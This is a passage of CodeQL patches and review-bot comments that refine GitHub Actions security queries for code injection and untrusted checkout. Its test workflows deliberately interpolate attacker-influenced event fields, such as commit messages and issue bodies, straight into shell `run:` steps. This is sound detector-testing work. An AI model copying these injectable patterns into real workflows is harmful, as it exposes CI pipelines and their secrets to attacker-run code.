@@ -338,10 +342,10 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses 
Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index a476bdc22d8..2b9bf3f2b79 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -1,6 +1,9 @@ | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From fe9c9088809ee4857fe9ef36d99ce7e4becdc554 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 14:18:20 +0200 Subject: [PATCH 0635/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a818ba5362a..a8fab786181 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.76 +version: 0.1.77 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fe6bdb0d77e..f5924ff430c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.76 +version: 0.1.77 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6136a987643087be93aeaa1b29069f688b9a416a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:54:04 +0100 Subject: [PATCH 0636/1267] Add getEvent to RemoteFlowSource for events able to trigger the source --- .../codeql/actions/dataflow/FlowSources.qll | 46 ++++++++++++++++--- 1 file changed, 40 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7dfdc42b05e..fa964f475cf 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -18,39 +18,47 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + /** Gets the event that triggered the source. */ + abstract Event getEvent(); + override string getThreatModel() { result = "remote" } } class GitHubCtxSource extends RemoteFlowSource { string flag; + Event event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; + Event event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getATriggerEvent() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or 
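Review bot: The context sources bind `event` in two different ways: `GitHubCtxSource` in this hunk and `GitHubEventJsonSource` (hunk at -181) use `e.getEnclosingWorkflow().getATriggerEvent()`, while `GitHubEventCtxSource` uses `e.getATriggerEvent()`, which per the Ast.qll change later in this series resolves through the enclosing job first. If job-level and workflow-level trigger sets can differ, the same expression would get different `getEvent()` results depending on which class matched; using `event = e.getATriggerEvent()` in all three would keep them aligned. The QLDoc on the new abstract predicate also reads as single-valued, and `/** Gets an event that can trigger this source. */` would match the commit subject better. `GitHubEventCtxSource`'s characteristic predicate continues past the end of this hunk.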
@@ -65,12 +73,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } string getContext() { result = context } + + override Event getEvent() { result = event } } abstract class CommandSource extends RemoteFlowSource { abstract string getCommand(); abstract Run getEnclosingRun(); + + override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } } class GitCommandSource extends RemoteFlowSource, CommandSource { @@ -181,18 +193,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; + Event event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -206,6 +219,8 @@ class GitHubEventJsonSource extends RemoteFlowSource { } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } /** @@ -217,6 +232,8 @@ class MaDSource extends RemoteFlowSource { MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } abstract class FileSource extends RemoteFlowSource { } 
@@ -228,12 +245,16 @@ class ArtifactSource extends RemoteFlowSource, FileSource { ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** * A file from an untrusted checkout. */ private class CheckoutSource extends RemoteFlowSource, FileSource { + Event event; + CheckoutSource() { // This should be: // source instanceof PRHeadCheckoutStep @@ -245,7 +266,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { uses.getCallee() = "actions/checkout" and exists(uses.getArgument("ref")) and not uses.getArgument("ref").matches("%base%") and - uses.getATriggerEvent().getName() = checkoutTriggers() + event = uses.getATriggerEvent() and + event.getName() = checkoutTriggers() ) or this.asExpr() instanceof GitMutableRefCheckout @@ -258,6 +280,8 @@ private class CheckoutSource extends RemoteFlowSource, FileSource { } override string getSourceType() { result = "artifact" } + + override Event getEvent() { result = event } } /** @@ -273,6 +297,8 @@ class DornyPathsFilterSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -294,6 +320,8 @@ class TJActionsChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } /** @@ -315,6 +343,8 @@ class TJActionsVerifyChangedFilesSource extends RemoteFlowSource { } override string getSourceType() { result = "filename" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class Xt0rtedSlashCommandSource extends RemoteFlowSource { 
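Review bot: In `CheckoutSource` the new field `event` is constrained only inside the `exists(Uses uses | …)` alternative (hunk at -245); the `or this.asExpr() instanceof GitMutableRefCheckout` alternative that follows does not mention it. Unless the lines between this hunk and the next one bind it, `event` is restricted only by its type for those alternatives, so `getEvent()` would return every `Event` in the database for git/gh based checkouts and any later filter on the triggering event would not narrow them. Binding it in each alternative avoids that, e.g. `this.asExpr() instanceof GitMutableRefCheckout and event = this.asExpr().getATriggerEvent()`. The characteristic predicate is only partly visible in these hunks.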
@@ -327,6 +357,8 @@ class Xt0rtedSlashCommandSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } class OctokitRequestActionSource extends RemoteFlowSource { @@ -348,4 +380,6 @@ class OctokitRequestActionSource extends RemoteFlowSource { } override string getSourceType() { result = "text" } + + override Event getEvent() { result = this.asExpr().getATriggerEvent() } } From e34835f71a8fd247afc4ea95d5f8d55785bf6cbb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:23 +0100 Subject: [PATCH 0637/1267] fix: AstNode.getATriggerEvent() getATriggerEvent did not work for nodes outside a Job. If there is no enclosing job, get the trigger from the enclosing workflow --- ql/lib/codeql/actions/ast/internal/Ast.qll | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ce6db22636c..5f33400bb96 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -114,7 +114,11 @@ abstract class AstNodeImpl extends TAstNode { /** * Gets and Event triggering this node. */ - EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingJob().getATriggerEvent() + or + not exists(this.getEnclosingJob()) and result = this.getEnclosingWorkflow().getATriggerEvent() + } /** * Gets the enclosing Step. From 62d9302e8ba4de3a8c4558451f8f4e7d88aedc20 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:55:44 +0100 Subject: [PATCH 0638/1267] chore: remove leftover commented out code --- ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll | 7 ------- 1 file changed, 7 deletions(-) 
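Review bot: The QLDoc above `getATriggerEvent()` in Ast.qll still reads "Gets and Event triggering this node." and does not describe the fallback this hunk adds. Suggested text: `Gets an Event triggering this node: the enclosing job's trigger events, or the enclosing workflow's when the node is not inside a job.` A node with neither an enclosing job nor an enclosing workflow (presumably one inside a composite `action.yml`) still gets no result; that is worth stating if intended, since the `getEvent()` overrides added in FlowSources.qll rely on this predicate.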
diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index ffbb6fac263..9653ae2beda 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -13,7 +13,6 @@ string checkoutTriggers() { */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - //source.asExpr().getATriggerEvent().getName() = checkoutTriggers() and ( // remote flow sources source instanceof ArtifactSource @@ -209,7 +208,6 @@ abstract class SHACheckoutStep extends PRHeadCheckoutStep { } class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesStep { ActionsMutableRefCheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists( ActionsMutableRefCheckoutFlow::PathNode source, ActionsMutableRefCheckoutFlow::PathNode sink @@ -242,7 +240,6 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { ActionsSHACheckout() { this.getCallee() = "actions/checkout" and - //this.getEnclosingJob().getATriggerEvent().getName() = checkoutTriggers() and ( exists(ActionsSHACheckoutFlow::PathNode source, ActionsSHACheckoutFlow::PathNode sink | ActionsSHACheckoutFlow::flowPath(source, sink) and @@ -273,7 +270,6 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GitMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) 
@@ -297,7 +293,6 @@ class GitMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GitSHACheckout extends SHACheckoutStep instanceof Run { GitSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("git\\s+(fetch|pull).*") and ( containsHeadSHA(cmd) @@ -318,7 +313,6 @@ class GitSHACheckout extends SHACheckoutStep instanceof Run { class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { GhMutableRefCheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch(".*(gh|hub)\\s+pr\\s+checkout.*") and ( (containsHeadRef(cmd) or containsPullRequestNumber(cmd)) @@ -341,7 +335,6 @@ class GhMutableRefCheckout extends MutableRefCheckoutStep instanceof Run { class GhSHACheckout extends SHACheckoutStep instanceof Run { GhSHACheckout() { exists(string cmd | this.getScript().getACommand() = cmd | - //this.getATriggerEvent().getName() = checkoutTriggers() and cmd.regexpMatch("gh\\s+pr\\s+checkout.*") and ( containsHeadSHA(cmd) From 792e8555af5b5a6628ee1ab956b81ffdaafe3a96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:56:59 +0100 Subject: [PATCH 0639/1267] fix: remove context 2 events mappings client_paylaod (dispatch), commits (push), head_commit (push) and merge_group are not under external attacker control so remove them --- ql/lib/ext/config/context_event_map.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 35ccafc5bee..4d28fa778e0 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml 
@@ -40,14 +40,10 @@ extensions: - ["workflow_run", "github.event.workflow_run"] - ["workflow_run", "github.event.changes"] # workflow_call receives the same event payload as the calling workflow - - ["workflow_call", "github.event.client_payload"] - ["workflow_call", "github.event.comment"] - - ["workflow_call", "github.event.commits"] - ["workflow_call", "github.event.discussion"] - - ["workflow_call", "github.event.head_commit"] - ["workflow_call", "github.event.inputs"] - ["workflow_call", "github.event.issue"] - - ["workflow_call", "github.event.merge_group"] - ["workflow_call", "github.event.pages"] - ["workflow_call", "github.event.pull_request"] - ["workflow_call", "github.event.review"] From 18137f58c299182fbbc1033e323d77c1a072e277 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:14 +0100 Subject: [PATCH 0640/1267] fix: take trigger events into consideration Code Injection remote flow sources should be triggerable by the privileged event --- .../Security/CWE-094/CodeInjectionCritical.ql | 6 +- .../.github/actions/action5/action.yml | 4 +- .../CWE-094/.github/workflows/test21.yml | 24 ++ .../CWE-094/CodeInjectionCritical.expected | 312 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 13 +- 5 files changed, 193 insertions(+), 166 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index ef66ac229f2..a197c577948 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
@@ -23,6 +23,7 @@ from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink, Event where CodeInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and + source.getNode().(RemoteFlowSource).getEvent() = event and not exists(ControlCheck check | check.protects(sink.getNode().asExpr(), event, "code-injection")) and // exclude cases where the sink is a JS script and the expression uses toJson not exists(UsesStep script | @@ -31,5 +32,6 @@ where exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, - "Potential code injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Potential code injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, + event.getLocation().getFile().toString() diff --git a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index a03c27be226..53a2e0c87e2 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.issue.body }}' - name: Step id: step env: @@ -25,7 +25,7 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.pull_request.body }} + FOO2: ${{ github.event.issue.body }} shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml new file mode 100644 index 00000000000..03ecc20de86 --- /dev/null 
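Review bot: The added conjunct `source.getNode().(RemoteFlowSource).getEvent() = event` silently drops a path whenever the source is not a `RemoteFlowSource` or its `getEvent()` has no result, so the failure mode for this security query is a missed alert rather than an error. Please confirm that every source class overrides `getEvent()`, and that findings removed here are still reported at a lower severity. The diffstat shows `CodeInjectionMedium.expected` changing, so that may already hold. A comment above the line, e.g. `// the source must be triggerable by the same privileged event as the sink`, would record why the join exists. The `where` clause continues between this hunk and the next.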
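Review bot: With `event` now in the `select`, a sink reachable from several privileged events produces one result row per event, where the previous select yielded a single row per source/sink pair. The second `$@` is labelled with `event.getLocation().getFile().toString()`, so the alert shows a bare file path in parentheses without saying what it refers to. Using `event.getName()` as the label, or rewording to `(triggered by $@)`, would make the message self-explanatory.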
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test21.yml @@ -0,0 +1,24 @@ +on: + push: + branches: + - main + - 'release/v*' + workflow_dispatch: + inputs: + version: + required: true + description: 'Release' + type: string + +jobs: + release-tag: + runs-on: ubuntu-latest + if: ${{ startsWith(github.event.head_commit.message, 'release:') }} + steps: + - name: Extract version and PR number from commit message + id: extract_info + shell: bash + run: | + echo "version=$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT + echo "pr_number=$( echo "${{ github.event.head_commit.message }}" | sed 's/.*(\#\([0-9]\+\)).*$/\1/' )" >> $GITHUB_OUTPUT + echo "release_branch=release/v$( echo "${{ github.event.head_commit.message }}" | sed 's/^release: v\([0-9]\+\.[0-9]\+\).*$/\1/' )" >> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index dd9836805bd..4a2950d84ae 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
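Review bot: Nothing in this new fixture says what it is meant to prove: three `${{ github.event.head_commit.message }}` interpolations reach the `run:` script, but the only triggers are `push` and `workflow_dispatch`. The preceding commit treats `head_commit` on push as outside external attacker control, so this looks like a case that must not be reported as critical, though that is inferred. A trailing comment such as `# head_commit.message in run: on push/workflow_dispatch; expected severity: <query name>` would make later `.expected` changes reviewable. Placing it after the last step keeps the line numbers recorded in the `.expected` files valid.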
@@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | 
@@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -612,153 +613,154 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action5/action.yml:19:19:19:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
